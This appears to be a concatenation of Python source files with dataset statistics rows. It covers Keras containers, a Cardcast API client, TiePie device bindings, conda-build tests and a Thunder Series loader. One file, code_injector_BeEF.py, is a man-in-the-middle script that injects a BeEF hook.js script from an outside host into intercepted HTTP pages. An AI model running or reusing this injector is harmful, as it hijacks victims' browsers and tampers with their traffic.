for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
items.append(item)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
| 25.912281 | 69 | 0.613067 | 332 | 2,954 | 5.240964 | 0.213855 | 0.050575 | 0.077586 | 0.03908 | 0.407471 | 0.407471 | 0.360345 | 0.360345 | 0.360345 | 0.360345 | 0 | 0 | 0.28436 | 2,954 | 113 | 70 | 26.141593 | 0.823084 | 0.030467 | 0 | 0.43038 | 0 | 0 | 0.048729 | 0.018715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.278481 | false | 0.012658 | 0.063291 | 0.075949 | 0.544304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
| 38.4 | 113 | 0.823893 | 341 | 3,072 | 7.046921 | 0.328446 | 0.069913 | 0.059509 | 0.082397 | 0.317104 | 0.225551 | 0.079068 | 0 | 0 | 0 | 0 | 0.001512 | 0.138672 | 3,072 | 79 | 114 | 38.886076 | 0.906652 | 0.079753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.945455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.02 | 90 | 0.622366 | 239 | 1,851 | 4.682008 | 0.422594 | 0.088472 | 0.071492 | 0.048257 | 0.103664 | 0.103664 | 0.055407 | 0 | 0 | 0 | 0 | 0.021723 | 0.253917 | 1,851 | 49 | 91 | 37.77551 | 0.788559 | 0.099946 | 0 | 0 | 0 | 0.03125 | 0.102667 | 0.034 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.09375 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b66acfc0f1fc9f0407ccd4877bc57ccf79afa1 | 4,691 | py | Python | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | 1 | 2020-04-09T10:12:46.000Z | 2020-04-09T10:12:46.000Z | # Copyright © 2015 Elizabeth Myers.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (DeckInfo, DeckInfoNotFoundError,
DeckInfoRetrievalError)
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
req = yield from aiohttp.request("get", self.deck_info_url.format
code=code))
if req.status == 200:
json=yield from req.json()
return DeckInfo.from_json(json)
elif req.status == 404:
err="Deck not found: {}".format(code)
raise DeckInfoNotFoundError(err)
else:
err="Error retrieving deck: {} (code {})".format(code,
req.status)
raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
req=yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json=yield from req.json()
return WhiteCard.from_json(json)
elif req.status == 404:
err="White cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err="Error retrieving white cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
req = yield from aiohtp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
def search_iter(self, name=None, author=None, category=None, offset=0,
limit=None):
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
while s.count > 0:
yield s
offset += s.count
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
| 37.830645 | 78 | 0.563206 | 492 | 4,691 | 5.315041 | 0.221545 | 0.051625 | 0.043595 | 0.026769 | 0.540344 | 0.51434 | 0.503633 | 0.491396 | 0.460421 | 0.429828 | 0 | 0.012593 | 0.3398 | 4,691 | 123 | 79 | 38.138211 | 0.83145 | 0 | 0 | 0.49 | 0 | 0 | 0.081339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b71c7227264e168736696fa5f4ef910e4d9c22 | 2,345 | py | Python | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | 6 | 2020-01-04T02:00:35.000Z | 2022-03-22T00:32:26.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | 3 | 2020-08-05T15:16:29.000Z | 2022-03-21T07:00:27.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | null | null | null | from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name)
| 33.028169 | 72 | 0.665245 | 281 | 2,345 | 5.185053 | 0.252669 | 0.075498 | 0.102951 | 0.117364 | 0.415923 | 0.415923 | 0.365134 | 0.341798 | 0.314345 | 0.314345 | 0 | 0.005017 | 0.234968 | 2,345 | 70 | 73 | 33.5 | 0.807135 | 0.108316 | 0 | 0.255319 | 0 | 0 | 0.002472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.191489 | false | 0 | 0.085106 | 0 | 0.531915 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7b8b9fdf2de5fb240b87971d0e7f35941af2c81 | 1,485 | py | Python | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
] | 1 | 2019-10-08T15:03:56.000Z | 2019-10-08T15:03:56.000Z | tests/test_render.py | awwad/conda-build | b0be80283ec2e3ef7e49b5da923b1438e74e27b5 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| 33 | 65 | 0.690909 | 207 | 1,485 | 4.676329 | 0.280193 | 0.216942 | 0.117769 | 0.016529 | 0.384298 | 0.334711 | 0.305785 | 0.305785 | 0.305785 | 0.305785 | 0 | 0.026059 | 0.173064 | 1,485 | 44 | 66 | 33.75 | 0.762215 | 0 | 0 | 0.114286 | 0 | 0 | 0.193939 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.114286 | false | 0 | 0.142857 | 0 | 0.257143 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b8e20d5ed5e23189a112d56d8a749537d1ecec | 173 | py | Python | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| 10.8125 | 26 | 0.421965 | 19 | 173 | 3.421053 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009804 | 0.410405 | 173 | 15 | 27 | 11.533333 | 0.627451 | 0.115607 | 0 | 0 | 0 | 0 | 0.067114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.125 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7c52b0c2a58b302536c4281e3d875f7998a6140 | 611 | py | Python | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
clearLogcatCmd = [adbPath, "-s", adbID, "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
| 33.944444 | 97 | 0.680851 | 70 | 611 | 5.942857 | 0.742857 | 0.038462 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03373 | 0.175123 | 611 | 17 | 98 | 35.941176 | 0.791667 | 0.184943 | 0 | 0 | 0 | 0 | 0.11359 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7c5b3d53e6ad031199ab57c86f15523078de6cc | 1,969 | py | Python | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 6 | 2018-08-15T13:29:22.000Z | 2020-09-12T14:39:20.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 26 | 2018-08-15T13:08:49.000Z | 2020-01-12T22:27:38.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 4 | 2018-08-15T13:52:26.000Z | 2019-04-28T17:09:04.000Z | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| 24.6125 | 79 | 0.584053 | 247 | 1,969 | 4.587045 | 0.396761 | 0.049426 | 0.026478 | 0.070609 | 0.338041 | 0.338041 | 0.338041 | 0.308914 | 0.308914 | 0.308914 | 0 | 0.012918 | 0.33164 | 1,969 | 79 | 80 | 24.924051 | 0.848024 | 0.224479 | 0 | 0.413043 | 0 | 0 | 0.07677 | 0.07677 | 0 | 0 | 0 | 0.012658 | 0.130435 | 1 | 0.086957 | false | 0 | 0.065217 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7d594ecefc0ecfe585fc9557bf2ed8617f874e6 | 1,944 | py | Python | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | 4 | 2015-12-22T15:03:43.000Z | 2016-07-28T08:11:48.000Z | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | null | null | null | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | null | null | null | import configparser
class Settings:
'''The Settings class is a wrapper for configparser and it's functions.
This class simplifies the tasks of loading, storing and manipulating
settings data.'''
def __init__(self, filename):
'''Create a new Settings object with a specific file name.'''
# Exceptions
self.__settingException = Exception(
'Cannot find specified setting data!')
# Settings variables
self.__filename = filename
self.__config = configparser.ConfigParser()
# Load settings from existing file (if one exists)
self.__isEmpty = len(self.__config.read(self.__filename)) == 0
def isEmpty(self):
'''Return True if there is not settings data loaded, otherwise return
False.'''
return self.__isEmpty
def addNewSetting(self, category, settingDict):
'''Add a new setting with the specified category and data. Save the new
settings data to a file.'''
self.__config[category] = settingDict.copy()
self.__saveAllSettings()
self.__isEmpty = False
def getSetting(self, category, key):
'''Return a setting value from the specified category and setting
key.'''
try:
return self.__config.get(category, key)
except KeyError:
raise self.__settingException
def editSetting(self, category, key, value):
'''Change an existing setting with a specified category and setting key
to the value specified. Save the new settings data to a file.'''
try:
self.__config.set(category, key, str(value))
self.__saveAllSettings()
except KeyError:
raise self.__settingException
def __saveAllSettings(self):
'''Write the current settings data to a file.'''
with open(self.__filename, 'w') as configFile:
self.__config.write(configFile)
| 36.679245 | 79 | 0.646091 | 222 | 1,944 | 5.477477 | 0.382883 | 0.049342 | 0.049342 | 0.037007 | 0.181743 | 0.116776 | 0.047697 | 0.047697 | 0 | 0 | 0 | 0.000707 | 0.272634 | 1,944 | 52 | 80 | 37.384615 | 0.859265 | 0.359054 | 0 | 0.285714 | 0 | 0 | 0.030822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.035714 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7dcc75b55961bd952da5e374d98d1ab7d3f5c96 | 40,969 | py | Python | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | """Provides SeriesLoader object and helpers, used to read Series data from disk or other filesystems.
"""
from collections import namedtuple
import json
from numpy import array, arange, frombuffer, load, ndarray, unravel_index, vstack
from numpy import dtype as dtypeFunc
from scipy.io import loadmat
from cStringIO import StringIO
import itertools
import struct
import urlparse
import math
from thunder.rdds.fileio.writers import getParallelWriterForPath
from thunder.rdds.keys import Dimensions
from thunder.rdds.fileio.readers import getFileReaderForPath, FileNotFoundError, appendExtensionToPathSpec
from thunder.rdds.imgblocks.blocks import SimpleBlocks
from thunder.rdds.series import Series
from thunder.utils.common import parseMemoryString, smallestFloatType
class SeriesLoader(object):
"""Loader object used to instantiate Series data stored in a variety of formats.
"""
def __init__(self, sparkContext, minPartitions=None):
"""Initialize a new SeriesLoader object.
Parameters
----------
sparkcontext: SparkContext
The pyspark SparkContext object used by the current Thunder environment.
minPartitions: int
minimum number of partitions to use when loading data. (Used by fromText, fromMatLocal, and fromNpyLocal)
"""
from thunder.utils.aws import AWSCredentials
self.sc = sparkContext
self.minPartitions = minPartitions
self.awsCredentialsOverride = AWSCredentials.fromContext(sparkContext)
def _checkOverwrite(self, outputDirPath):
from thunder.utils.common import raiseErrorIfPathExists
raiseErrorIfPathExists(outputDirPath, awsCredentialsOverride=self.awsCredentialsOverride)
def fromArrays(self, arrays, npartitions=None):
"""
Create a Series object from a sequence of 1d numpy arrays on the driver.
"""
# recast singleton
if isinstance(arrays, ndarray):
arrays = [arrays]
# check shape and dtype
shape = arrays[0].shape
dtype = arrays[0].dtype
for ary in arrays:
if not ary.shape == shape:
raise ValueError("Inconsistent array shapes: first array had shape %s, but other array has shape %s" %
(str(shape), str(ary.shape)))
if not ary.dtype == dtype:
raise ValueError("Inconsistent array dtypes: first array had dtype %s, but other array has dtype %s" %
(str(dtype), str(ary.dtype)))
# generate linear keys
keys = map(lambda k: (k,), xrange(0, len(arrays)))
return Series(self.sc.parallelize(zip(keys, arrays), npartitions), dtype=str(dtype))
def fromArraysAsImages(self, arrays):
"""Create a Series object from a sequence of numpy ndarrays resident in memory on the driver.
The arrays will be interpreted as though each represents a single time point - effectively the same
as if converting Images to a Series, with each array representing a volume image at a particular
point in time. Thus in the resulting Series, the value of the record with key (0,0,0) will be
array([arrays[0][0,0,0], arrays[1][0,0,0],... arrays[n][0,0,0]).
The dimensions of the resulting Series will be *opposite* that of the passed numpy array. Their dtype will not
be changed.
"""
# if passed a single array, cast it to a sequence of length 1
if isinstance(arrays, ndarray):
arrays = [arrays]
# check that shapes of passed arrays are consistent
shape = arrays[0].shape
dtype = arrays[0].dtype
for ary in arrays:
if not ary.shape == shape:
raise ValueError("Inconsistent array shapes: first array had shape %s, but other array has shape %s" %
(str(shape), str(ary.shape)))
if not ary.dtype == dtype:
